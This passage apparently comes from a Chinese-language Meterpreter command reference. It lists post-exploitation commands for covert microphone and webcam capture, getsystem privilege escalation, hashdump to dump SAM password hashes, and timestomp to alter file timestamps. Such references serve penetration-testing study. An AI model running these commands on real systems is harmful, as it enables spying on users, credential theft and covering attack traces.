record_mic      - 从默认麦克风记录音频X秒
webcam_chat - 启动视频聊天
webcam_list - 列出摄像头
webcam_snap - 从指定的网络摄像头获取snapshot
webcam_stream - 从指定的网络摄像头播放视频流

音频输出命令

1
play - 在目标系统上播放波形音频文件(.wav)

提权命令

1
getsystem - 获得系统管理员权限

密码转储命令

1
2
3
4
5
hashdump - 抓取哈希密码 (SAM) 文件中的值

run hashdump

run smart_hashdump

Timestomp

1
2
3
4
5
6
timestomp - 操作修改文件的MACE属性

Modified:修改时间
Accessed:访问时间
Created:创建时间
Entry Modified: 条目修改时间